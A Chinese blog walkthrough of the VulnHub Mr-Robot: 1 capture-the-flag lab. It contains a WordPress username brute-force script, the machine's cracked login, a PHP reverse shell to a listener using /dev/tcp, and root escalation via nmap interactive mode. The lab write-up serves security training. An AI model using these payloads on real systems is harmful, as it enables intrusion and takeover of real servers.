Mr-Robot: 1

07:39

Mr-Robot: 1靶机
https://www.vulnhub.com/entry/mr-robot-1,151/

目标
-得到root

*如果要下载来玩建议不要看, 因为剧透了

1. 打开你的Kali和靶机(Mr-Robot: 1)

2. 使用netdiscover识别靶机.

3. 使用Zenmap扫描靶机看有什么服务端口.

4. 因为有Apache服务, 所以打开靶机上面的网页看看.
不可否认它做的页面挺帅的, 看了他的网页码没有发现什么.

5. 使用dirb爆破一下网页目录.

6. 因为这个靶机是robot，然后爆破目录也有robot所以打开看看有什么能用的.
里面有两个文件fsocity.dic和key-1-of-3.txt

7. 先看看key-1-of-3.txt, 是一句加密hash之类的文字.
我尝试解开但失败了, 所以保留下来可能之后能用.

8. 再看看fsocity.dic, 发现是要下载的.

10. 使用文本编辑打开fsocity.dic发现里面很多英语单词, 应该是用来爆破(Brute Force Attack).

11. 我在dirb下还发现了wordpress的痕迹.

12. 使用nikto扫描看看, 果然有wordpress的登入页面.

13. 打开看看, 果然是wordpress的登入界面.

14. 使用WPScan扫描它, 看有没有漏洞.

15. 在等待的同时, 我们来试一试用它给的fsocity.dic文件里面的单词爆破看看有没有存在的用户名.
先把fsocity.dic转成fsocity.txt

16. 上网找到了一个可以尝试用户爆破的pyhton，所以我就复制并改一改自己用了.
#nano mrrobot.py (创建一个文件名为mrrobot.py, 然后把code复制进去)
#python mrrobot.py (使用pyhton运行mrrobot.py)
成功得到用用户名elliot大小字母都一样

mrrobot.py
import requests

open_file = open('fsocity.txt', 'r')

temp = open_file.read().splitlines()

count = 0

for username in temp:

payload = {'log': '{0}'.format(username), 'pwd': 'dummy'}

headers = {'Content-Type' : 'application/x-www-form-urlencoded'}

cookies = dict(wordpress_test_cookie='WP+Cookie+check')

r = requests.post("http://192.168.1.223/wp-login.php", data=payload, headers=headers, cookies=cookies)

if "Invalid username" not in r.text:

print username

17. 那么我们再使用wpscan爆破(Brute Force Attack)一下这个用户的密码.

18. 等了一下, 果然出来了
Username : elliot
Password : ER28-0652

19.使用刚刚的账号密码登入Wordpress看看.

20. 成功登入Wordpress.

21. 那么我看到这个upload.php页面, 应该可以上传文件来反弹php Shell.

22. 之后我也看到这404.php可以编辑并调用php命令. 试一试看能不能用来反弹php shell看看.

23. 打开netcat监听666端口.

24. 把原本的文字全部删除并把反弹shell的php码复制进去, 并点击Upload File.

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.230/666 0>&1'");

?>

25. 成功保存, 看起来是可以运行.

26. 调用404.php.

27. 成功得到了Shell.

28. 查看用户权限, 是一个普通用户.

29. 查看到Home目录下有一个robot用户的文件夹，里面有两个password.raw-md5和key-2-of-3.txt.
打开key-2-of-3.txt我们需要robot用户权限
打开password.raw-md5我们就看见就robot:(hash), 可以得知这个Hash应该是经过md5加密了的, 应该是属于robot用户的密码.

30. 随便找个md5就编译成功了.

31. 那么就升级成robot用户.

32.查看刚刚那个需要权限的key-2-of-3.txt文件, 又得到了一个Hash.

33. 查看一下有什么是被suid标记了的命令, 好让我们可以使用
那4000是file permission的数值, 当然你要用+6000还是其他都可以.

34. 上网查看了这里说早期的nmap有一个互动模式(interactive mode)可以得到root权限.
那么就试一试, 因为调试也很简单
nmap --interactive
!sh

35. 成功得到root, 还找到了key-3-of-3.txt.

感谢阅读

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Created By SoraTemplates | Distributed By Gooyaabi Templates